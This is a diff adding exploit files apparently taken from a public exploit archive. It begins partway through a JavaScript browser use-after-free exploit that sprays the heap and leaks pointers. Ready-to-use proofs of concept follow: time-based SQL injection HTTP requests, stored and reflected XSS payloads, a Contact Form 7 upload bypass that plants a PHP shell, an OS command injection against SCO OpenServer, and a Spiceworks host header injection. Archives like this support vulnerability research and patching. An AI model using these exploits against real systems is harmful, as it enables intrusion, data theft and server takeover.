+		/*
+		 * Spray a couple of StringImpl obj. prior to Timer allocation
+		 * This will force Timer allocation on same SmallPage as our Strings
+		 */
+		sprayStringImpl(0, SPRAY_STRINGIMPL);
+
+		g_frames = [];
+		g_round += 1;
+		g_input = input3;
+
+		setTimeout(confuseTargetObjRound1, 10);
+	} else {
+		setTimeout(confuseTargetObjRound2, 10);
+	}
+}
+
+function dumpTargetObj() {
+	debug_log("[+] m_timer: " + g_timer_leak);
+	debug_log("[+] m_messageHeading: " + g_message_heading_leak);
+	debug_log("[+] m_messageBody: " + g_message_body_leak);
+}
+
+function findTargetObj() {
+	for (let i = 0; i < g_arr_ab_1.length; i++) {
+		if (!Int64.fromDouble(g_arr_ab_1[i][2]).equals(Int64.Zero)) {
+			debug_log("[+] Found fake ValidationMessage");
+
+			if (g_round === 2) {
+				g_timer_leak = Int64.fromDouble(g_arr_ab_1[i][2]);
+				g_message_heading_leak = Int64.fromDouble(g_arr_ab_1[i][4]);
+				g_message_body_leak = Int64.fromDouble(g_arr_ab_1[i][5]);
+				g_round++;
+			}
+
+			g_fake_validation_message = g_arr_ab_1[i];
+			g_arr_ab_1 = [];
+			return true;
+		}
+	}
+	return false;
+}
+
+function prepareUAF() {
+	g_input.setCustomValidity("ps4");
+
+	for (let i = 0; i < NB_FRAMES; i++) {
+		var element = document.createElement("frameset");
+		g_frames.push(element);
+	}
+
+	g_input.reportValidity();
+	var div = document.createElement("div");
+	document.body.appendChild(div);
+	div.appendChild(g_input);
+
+	/* First half spray */
+	for (let i = 0; i < NB_FRAMES / 2; i++)
+		g_frames[i].setAttribute("rows", g_rows1);
+
+	/* Instantiate target obj */
+	g_input.reportValidity();
+
+	/* ... and the second half */
+	for (let i = NB_FRAMES / 2; i < NB_FRAMES; i++)
+		g_frames[i].setAttribute("rows", g_rows2);
+
+	g_input.setAttribute("onfocus", "reuseTargetObj()");
+	g_input.autofocus = true;
+}
+
+/* HTMLElement spray */
+function sprayHTMLTextArea() {
+	debug_log("[+] Spraying HTMLTextareaElement ...");
+
+	let textarea_div_elem = document.createElement("div");
+	document.body.appendChild(textarea_div_elem);
+	textarea_div_elem.id = "div1";
+	var element = document.createElement("textarea");
+
+	/* Add a style to avoid textarea display */
+	element.style.cssText = 'display:block-inline;height:1px;width:1px;visibility:hidden;';
+
+	/*
+	 * This spray is not perfect, "element.cloneNode" will trigger a fastMalloc
+	 * allocation of the node attributes and an IsoHeap allocation of the
+	 * Element. The virtual page layout will look something like that:
+	 * [IsoHeap] [fastMalloc] [IsoHeap] [fastMalloc] [IsoHeap] [...]
+	 */
+	for (let i = 0; i < SPRAY_ELEM_SIZE; i++)
+		textarea_div_elem.appendChild(element.cloneNode());
+}
+
+/* StringImpl Spray */
+function sprayStringImpl(start, end) {
+	for (let i = start; i < end; i++) {
+		let s = new String("A".repeat(LENGTH_TIMER - LENGTH_STRINGIMPL - 5) + i.toString().padStart(5, "0"));
+		g_obj_str[s] = 0x1337;
+	}
+}
+
+function go() {
+	/* Init spray */
+	sprayHTMLTextArea();
+
+	g_input = input1;
+	/* Shape heap layout for obj. reuse */
+	prepareUAF();
+}
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49297.txt b/exploits/multiple/webapps/49297.txt
new file mode 100644
index 000000000..c33d4b7d2
--- /dev/null
+++ b/exploits/multiple/webapps/49297.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Spotweb 1.4.9 - 'search' SQL Injection
+# Google Dork: N/A
+# Date: 20 December 2020
+# Exploit Author: BouSalman
+# Vendor Homepage: https://github.com/spotweb/spotweb
+# Software Link: N/A
+# Version: 1.4.9
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2020-35545
+
+
+GET /?page=index&search[tree]=cat0_z0_c')+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))c)+AND+(' HTTP/1.1
+Host: 192.168.99.151
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49298.txt b/exploits/multiple/webapps/49298.txt
new file mode 100644
index 000000000..302800568
--- /dev/null
+++ b/exploits/multiple/webapps/49298.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Academy-LMS 4.3 - Stored XSS
+# Date: 19/12/2020
+# Vendor page: https://academy-lms.com/
+# Version: 4.3
+# Tested on Win10 and Google Chrome
+# Exploit Author: Vinicius Alves
+
+# XSS Payload: "><h1>STORED XSS</h1> (Scripts tag blocked)
+
+1) Access LMS and log in to admin panel
+2) Access courses page
+3) Open course manager and SEO menu
+4) Paste the XSS Payload tag and Submit
+5) Access the course page on frontend
+6) Exploited!
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49302.txt b/exploits/multiple/webapps/49302.txt
new file mode 100644
index 000000000..1244a1154
--- /dev/null
+++ b/exploits/multiple/webapps/49302.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'Remote Report' Reflected XSS
+# Date: 08/01/2020
+# Exploit Author: Marco Nappi
+# Vendor Homepage: https://www.flexmonster.com/
+# Version:Flexmonster Pivot Table & Charts 2.7.17
+# Tested on:Flexmonster Pivot Table & Charts 2.7.17
+# CVE : CVE-2020-20140
+
+Cross Site Scripting (XSS) vulnerability in Remote Report component under the Open menu in Flexmonster Pivot Table & Charts 2.7.17
+
+Reflected XSS:
+The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.
+
+payload:
+<svg onload=alert("OpenRemoteReport")><!--
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49303.txt b/exploits/multiple/webapps/49303.txt
new file mode 100644
index 000000000..90bf9784f
--- /dev/null
+++ b/exploits/multiple/webapps/49303.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'To OLAP' Reflected XSS
+# Date: 08/01/2020
+# Exploit Author: Marco Nappi
+# Vendor Homepage: https://www.flexmonster.com/
+# Version:Flexmonster Pivot Table & Charts 2.7.17
+# Tested on:Flexmonster Pivot Table & Charts 2.7.17
+# CVE : CVE-2020-20141
+
+Cross Site Scripting (XSS) vulnerability in the To OLAP (XMLA) component Under the Connect menu in Flexmonster Pivot Table & Charts 2.7.17.
+
+Reflected XSS:
+The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.
+
+payload:
+<svg onload=alert("OLAPTool")><!--
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49304.txt b/exploits/multiple/webapps/49304.txt
new file mode 100644
index 000000000..5304bb963
--- /dev/null
+++ b/exploits/multiple/webapps/49304.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'To remote CSV' Reflected XSS
+# Date: 08/01/2020
+# Exploit Author: Marco Nappi
+# Vendor Homepage: https://www.flexmonster.com/
+# Version:Flexmonster Pivot Table & Charts 2.7.17
+# Tested on:Flexmonster Pivot Table & Charts 2.7.17
+# CVE : CVE-2020-20142
+
+Cross Site Scripting (XSS) vulnerability in the "To Remote CSV" component under "Open" Menu in Flexmonster Pivot Table & Charts 2.7.17.
+
+Reflected XSS:
+The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.
+
+payload:
+<svg onload=alert("OpenRemoteCSV")><!--
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49305.txt b/exploits/multiple/webapps/49305.txt
new file mode 100644
index 000000000..4da871ebc
--- /dev/null
+++ b/exploits/multiple/webapps/49305.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'Remote JSON' Reflected XSS
+# Date: 08/01/2020
+# Exploit Author: Marco Nappi
+# Vendor Homepage: https://www.flexmonster.com/
+# Version: Flexmonster Pivot Table & Charts 2.7.17
+# Tested on: Flexmonster Pivot Table & Charts 2.7.17
+# CVE : CVE-2020-20139
+
+Cross Site Scripting (XSS) vulnerability in the Remote JSON component 
+
+Reflected XSS:
+The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.
+
+payload:
+<svg onload=alert("OpenRemoteJSON")><!--
\ No newline at end of file
diff --git a/exploits/php/webapps/49294.txt b/exploits/php/webapps/49294.txt
new file mode 100644
index 000000000..c239fd3c3
--- /dev/null
+++ b/exploits/php/webapps/49294.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Wordpress Plugin Contact Form 7 5.3.1 - Unrestricted File Upload
+# Date: 12/20/2020
+# Exploit Author: Ramón Vila Ferreres (@ramonvfer)
+# Vendor Homepage: https://contactform7.com
+# Software Link: https://wordpress.org/plugins/contact-form-7/
+# Version: 5.3.1 and below
+# Tested on: Windows 10 1909, Ubuntu 20.4
+
+Explanation
+---------------------------------------------------------------------
+ContactForm7 version 5.3.1 and below doesn't properly sanitize 
+uploaded filenames to prevent Arbitrary File Upload that can lead
+to full server takeover in the worst-case scenario.
+
+This happens in the wpcf7_antiscript_file_name function, that fails
+to sanitize the provided filename if it ends with any Unicode special
+character ranging from U+0000 (null) to U+001F (us).
+
+The function matches both the file name and the file extension against
+an exclusion regex. Appending any unicode special character to the 
+file extension results in a complete bypass of this verification (as
+the regex doesn't match) leading to the Unrestricted File Upload.
+
+Exploit
+---------------------------------------------------------------------
+1. Change the file extension of the file you want to upload (e.g: 
+"shell.php") to its equivalent with the special character ending (in
+this case "shell.php" (appended U+0000))
+
+2. Upload the file using ContactForm7 file upload feature in the 
+target website.
+
+3. Go to <target.com>/wp-content/uploads/wpcf7_uploads/shell.php
+Note the special character at the end
+Note that the file upload location may vary as it is configurable.
+
+4. Now you have uploaded your file!
\ No newline at end of file
diff --git a/exploits/php/webapps/49296.txt b/exploits/php/webapps/49296.txt
new file mode 100644
index 000000000..a5e36cfff
--- /dev/null
+++ b/exploits/php/webapps/49296.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Queue Management System 4.0.0 - "Add User" Stored XSS
+
+# Exploit Author: Kislay Kumar
+# Date: 2020-12-21
+# Google Dork: N/A
+# Vendor Homepage: http://codekernel.net/
+# Software Link: https://codecanyon.net/item/queue-management-system/22029961
+# Affected Version: Version 4.0.0
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Kali Linux
+
+Step 1. Login as admin.
+
+Step 2. Select "Users" from menu and click on "Add User .
+
+Step 3. Insert payload - "><svg/onload=alert(1)> in "Firtst Name" , " Last
+Name "and " Email ".
+
+Step 4. Now open "User List " from menu and you will get alert box.
\ No newline at end of file
diff --git a/exploits/php/webapps/49306.txt b/exploits/php/webapps/49306.txt
new file mode 100644
index 000000000..d1ed66ba1
--- /dev/null
+++ b/exploits/php/webapps/49306.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Point of Sale System 1.0 - Multiple Stored XSS
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-18
+# Vendor Homepage: https://www.sourcecodester.com/php/9620/point-sale-system-pos.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=9620&title=Point+of+Sale+System+%28POS%29+using+PHP+with+Source+Code
+# Affected Version: Version 1
+# Tested on: Parrot OS
+
+Step 1. Login to the application with admin credentials
+
+Step 2. Click on "Suppliers" in header and select "Add Supplier".
+
+Step 3. Input "<script>alert("r0b0tG4nG")</script>" in all fields of the form.
+Note: Stored XSS vulnerability can also be found "Customers Page" when you select "Add New Customer". Apply Same method above to execute Stored XSS.
+
+Step 4. Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Suppliers Page", your XSS Payloads will be triggered.
+
+Note: Stored XSS can also be triggered when you click on "Products Page" and select "Add New Product".
\ No newline at end of file
diff --git a/exploits/php/webapps/49307.txt b/exploits/php/webapps/49307.txt
new file mode 100644
index 000000000..5c40e7e0c
--- /dev/null
+++ b/exploits/php/webapps/49307.txt
@@ -0,0 +1,91 @@
+# Exploit Title: Online Marriage Registration System 1.0 - 'searchdata' SQL Injection
+# Date: 12-21-2020
+# Exploit Authors: Andrea Bruschi, Raffaele Sabato
+# Vendor: Phpgurukul
+# Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
+# Version: 1.0
+
+I DESCRIPTION
+========================================================================
+
+A Time Based SQL Injection vulnerability was discovered in Online Marriage Registration System 1.0, in omrs/user/search.php and in omsr/admin/search.php. The request is authenticated but it is possible to register a new user account. 
+Following the vulnerable code:
+
+$sdata=$_POST['searchdata'];
+  ?>
+  <h4 align="center">Result against "<?php echo $sdata;?>" keyword </h4>  
+            <table id="datatable1" class="table display responsive nowrap">
+              <thead>
+                <tr>
+                  <th class="wd-15p">S.No</th>
+                
+                  <th class="wd-15p">Reg Number</th>
+                  <th class="wd-20p">Husband Name</th>
+                  
+                  <th class="wd-10p">Date of Marriage</th>
+                  <th class="wd-10p">Status</th>
+                  <th class="wd-25p">Action</th>
+                </tr>
+              </thead>
+              <tbody>
+                <?php
+                $uid=$_SESSION['omrsuid'];
+$sql="SELECT * from tblregistration where RegistrationNumber like '$sdata%' && UserID='$uid'";
+$query = $dbh -> prepare($sql);
+$query->execute();
+$results=$query->fetchAll(PDO::FETCH_OBJ);
+
+II PROOF OF CONCEPT
+========================================================================
+
+## Request user
+
+POST /omrs/user/search.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------197361427118054779422510078884
+Content-Length: 320
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/omrs/user/search.php
+Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2
+Upgrade-Insecure-Requests: 1
+
+-----------------------------197361427118054779422510078884
+Content-Disposition: form-data; name="searchdata"
+
+' and (select 1 from (select(sleep(5)))a) and 'a'='a
+-----------------------------197361427118054779422510078884
+Content-Disposition: form-data; name="search"
+
+
+-----------------------------197361427118054779422510078884--
+
+## Request admin
+
+POST /omrs/admin/search.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------267799269040335247322746025522
+Content-Length: 320
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/omrs/admin/search.php
+Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2
+Upgrade-Insecure-Requests: 1
+
+-----------------------------267799269040335247322746025522
+Content-Disposition: form-data; name="searchdata"
+
+' and (select 1 from (select(sleep(5)))a) and 'a'='a
+-----------------------------267799269040335247322746025522
+Content-Disposition: form-data; name="search"
+
+
+-----------------------------267799269040335247322746025522--
\ No newline at end of file
diff --git a/exploits/sco/webapps/49300.txt b/exploits/sco/webapps/49300.txt
new file mode 100644
index 000000000..5b6ad932c
--- /dev/null
+++ b/exploits/sco/webapps/49300.txt
@@ -0,0 +1,128 @@
+# Exploit Title: SCO Openserver 5.0.7 - 'section' Reflected XSS
+# Google Dork: inurl:/cgi-bin/manlist?section
+# Discovered Date: 14/06/2020
+# Author: Ramikan
+# Vendor Homepage: https://www.xinuos.com/products
+# Software Link: https://www.sco.com/products/openserver507/-overview
+# Affected Version: Tested on 5.0.7, 6 can be affected on other versions.
+# Tested on: SCO Openserver 5.0.7 & version 6
+# CVE : CVE-2020-25495
+
+*************************************************************************************************************************************
+
+Vulnerability :Refelected XSS & HTML Injection
+
+*************************************************************************************************************************************
+A reflected Cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'.
+
+
+Affected URL:http://host:8457/cgi-bin/manlist?section="><h1>hello</h1><script>alert(123)</script>
+Affected Paramenter: section
+
+*************************************************************************************************************************************
+POC
+
+*************************************************************************************************************************************
+Request:
+*************************************************************************************************************************************
+GET /cgi-bin/manlist?section="><h1>hello</h1><script>alert(123)</script> HTTP/1.1
+Host: 192.168.20.48:8457
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+*************************************************************************************************************************************
+Response: 
+*************************************************************************************************************************************
+HTTP/1.1 200 OK
+Date: Thu, 03 Sep 2020 17:08:51 GMT
+Server: Apache/1.3.36 (Unix) mod_perl/1.29
+Connection: close
+Content-Type: text/html;charset=ISO-8859-1
+Content-Length: 2680
+
+<!DOCTYPE html
+	PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
+	 "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
+<head>
+<title>Manual section "><h1>hello</h1></P><script>alert(123)</script></title>
+<META HTTP-EQUIV='Content-Type' CONTENT='text/html;charset=ISO-8859-1'>
+<link rel="stylesheet" type="text/css" href="/styles/lin_moz.css" />
+<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
+</head>
+<body bgcolor="#FFFFFF" topmargin="0" marginheight="0">
+<!-- Begin DocView navigation toolbar -->
+<!--htdig_noindex-->
+<table
+class=dvtb
+width="100%"
+cellpadding=0
+cellspacing=0
+border=0
+style="padding: 0;"
+>
+<tr valign=top class=dvtb>
+<td class=dvdb>
+<table 
+class=dvtb
+cellpadding=3
+cellspacing=1
+border=0
+bgcolor=#FFFFFF
+width=611
+>
+<tr class=dvtb>
+<td class=dvtb align=center  style="background: #2059A6;">
+<a href="/en/index.html" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
+DOC HOME
+</a></td>
+<td class=dvtb align=center  style="background: #2059A6;">
+<a href="/en/Navpages/sitemap.html" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
+SITE MAP
+</a></td>
+<td class=dvtb align=center  style="background: #2059A6;">
+<a href="/cgi-bin/manform?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
+MAN PAGES
+</a></td>
+<td class=dvtb align=center  style="background: #2059A6;">
+<a href="/cgi-bin/infocat?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
+GNU INFO
+</a></td>
+<td class=dvtb align=center  style="background: #2059A6;">
+<a href="/cgi-bin/search?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;">
+SEARCH
+</a></td>
+</tr>
+</table>
+</td>
+<td class=dvtb align="left" width=100%>
+<table
+class=dvtb
+cellpadding="3"
+cellspacing="1"
+border="0"
+width="100%"
+bgcolor="#FFFFFF"
+>
+<tr class=dvtb valign="top">
+<td class=dvtb  style="background: #2059A6;" align=center width=100%>
+<a name=null class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;" >
+&nbsp;
+</a>
+</td>
+</tr>
+</table>
+</td>
+</tr>
+</table>
+<!--/htdig_noindex-->
+<!-- End DocView navigation toolbar -->
+<h1>Manual section<h1>Manual section "><h1>hello</h1></P><script>alert(123)</script></h1><PRE>
+</PRE>
+</body></html>
\ No newline at end of file
diff --git a/exploits/sco/webapps/49301.txt b/exploits/sco/webapps/49301.txt
new file mode 100644
index 000000000..86e733373
--- /dev/null
+++ b/exploits/sco/webapps/49301.txt
@@ -0,0 +1,51 @@
+# Exploit Title: SCO Openserver 5.0.7 - 'outputform' Command Injection
+# Google Dork: inurl:/cgi-bin/manlist?section
+# Discovered Date: 04/09/2020
+# Author: Ramikan
+# Vendor Homepage: https://www.xinuos.com/products/
+# Software Link: https://www.sco.com/products/openserver507/-overview
+# Affected Version: Tested on 5.0.7, 6 can be affected on other versions.
+# Tested on: SCO Openserver 5.0.7 & version 6
+# CVE : CVE-2020-25494
+
+*************************************************************************************************************************************
+
+Vulnerability :OS Command Injection
+
+*************************************************************************************************************************************
+The outputform, toclevels parameter appears to be vulnerable to OS command injection attacks. It is possible to use various shell metacharacters to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability. It is also possible to cause the application to interact with an external domain, to verify that a command was executed.  The payload |nslookup -q=cname mytest.com.& was submitted in the parameters. The application performed a DNS lookup for the specified domain name.  Additionally, the payload |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 was submitted in the parameters. The application took 20960 milliseconds to respond to the request, compared with 1348 milliseconds for the original request.
+
+Affected URL:http://host:8457/cgi-bin/printbook
+Affected Paramenter: outputform, toclevels
+
+*************************************************************************************************************************************
+POC
+
+*************************************************************************************************************************************
+Request:
+*************************************************************************************************************************************
+POST /cgi-bin/printbook HTTP/1.1
+Host: 10.0.0.45:8457
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://10.0.0.45:8457/en/Navpages/printmap.html
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 118
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+outputform=ps%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23'%20%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23%5c%22%20%7cping%20-n%2021%20127.0.0.1&booktitle=test&toclevels=3&part=%2Fen%2FOSR_FEATS%2FCONTENTS.html&part=%2Fen%2FUSE_oview%2FCONTENTS.
+
+*************************************************************************************************************************************
+Response:
+*************************************************************************************************************************************
+
+HTTP/1.1 200 OK
+Date: Tue, 04 Sep 2020 11:17:52 GMT
+Server: Apache/1.3.33 (Unix) mod_perl/1.29
+Connection: close
+Content-Type: text/html;charset=ISO-8859-1
+Content-Length: 3188
\ No newline at end of file
diff --git a/exploits/windows/webapps/49299.txt b/exploits/windows/webapps/49299.txt
new file mode 100644
index 000000000..cc1893eba
--- /dev/null
+++ b/exploits/windows/webapps/49299.txt
@@ -0,0 +1,352 @@
+# Exploit Title: Spiceworks 7.5 - HTTP Header Injection
+# Google Dork: inurl:/pro_users/login
+# Discovered Date: 15/09/2020
+# Exploit Author: Ramikan
+# Vendor Homepage: https://www.spiceworks.com
+# Affected Version: 7.5.7.0 may be others.
+# Tested On Version: 7.5.7.0 
+# CVE : CVE-2020-25901
+
+Vulnerability: Host Header Injection
+
+
+Description:
+Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages.
+
+An issue was discovered in Spiceworks version 7.5.7.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack.
+
+
+Request:
+
+GET / HTTP/1.1
+Host: google.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; compatibility_test=testing; _gk=%7B%22t%22%3A%7B%7D%2C%22p%22%3A%7B%22cg_allow_st%22%3A%22%5B%5D%22%2C%22uuid%22%3A%22b7f707b6-f574-44bb-a766-986fc5851a03%22%7D%2C%22ab%22%3A%7B%7D%7D; opt_out=zdc; euconsent=BO3ulHHO3ulQVASABAENDWAAAAAyOAAA; _evidon_suppress_notification_cookie={"date":"\"2020-09-15T12:20:47Z\""}
+Upgrade-Insecure-Requests: 1
+
+Response:
+
+HTTP/1.1 302 Found
+Date: Tue, 15 Sep 2020 12:46:52 GMT
+Cache-Control: no-cache
+X-Runtime: 0
+Set-Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; path=/; HttpOnly
+Location: http://google.com/pro_users/login
+Content-Length: 99
+Connection: close
+Content-Type: text/html; charset=utf-8
+
+<html><body>You are being <a href="http://google.com/pro_users/login">redirected</a>.</body></html>
+
+Request:2
+
+GET /pro_users/login HTTP/1.1
+Host: google.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; compatibility_test=testing; _gk=%7B%22t%22%3A%7B%7D%2C%22p%22%3A%7B%22cg_allow_st%22%3A%22%5B%5D%22%2C%22uuid%22%3A%22b7f707b6-f574-44bb-a766-986fc5851a03%22%7D%2C%22ab%22%3A%7B%7D%7D; opt_out=zdc; euconsent=BO3ulHHO3ulQVASABAENDWAAAAAyOAAA; _evidon_suppress_notification_cookie={"date":"\"2020-09-15T12:20:47Z\""}
+Upgrade-Insecure-Requests: 1
+
+Response:2 (Forgot your password)Link replaced with domain in the header.
+
+HTTP/1.1 200 OK
+Date: Tue, 15 Sep 2020 12:48:26 GMT
+Cache-Control: private, max-age=0, must-revalidate
+X-UA-Compatible: IE=edge,chrome=1
+X-Runtime: 0
+ETag: "77c8f98180ec3f6d4f2fcc8dcd796462"
+Set-Cookie: compatibility_test=testing; path=/
+Set-Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; path=/; HttpOnly
+Content-Length: 9875
+Connection: close
+Content-Type: text/html; charset=utf-8
+
+<!DOCTYPE html>
+<html lang="en" class="no-js desktop">
+  <head>
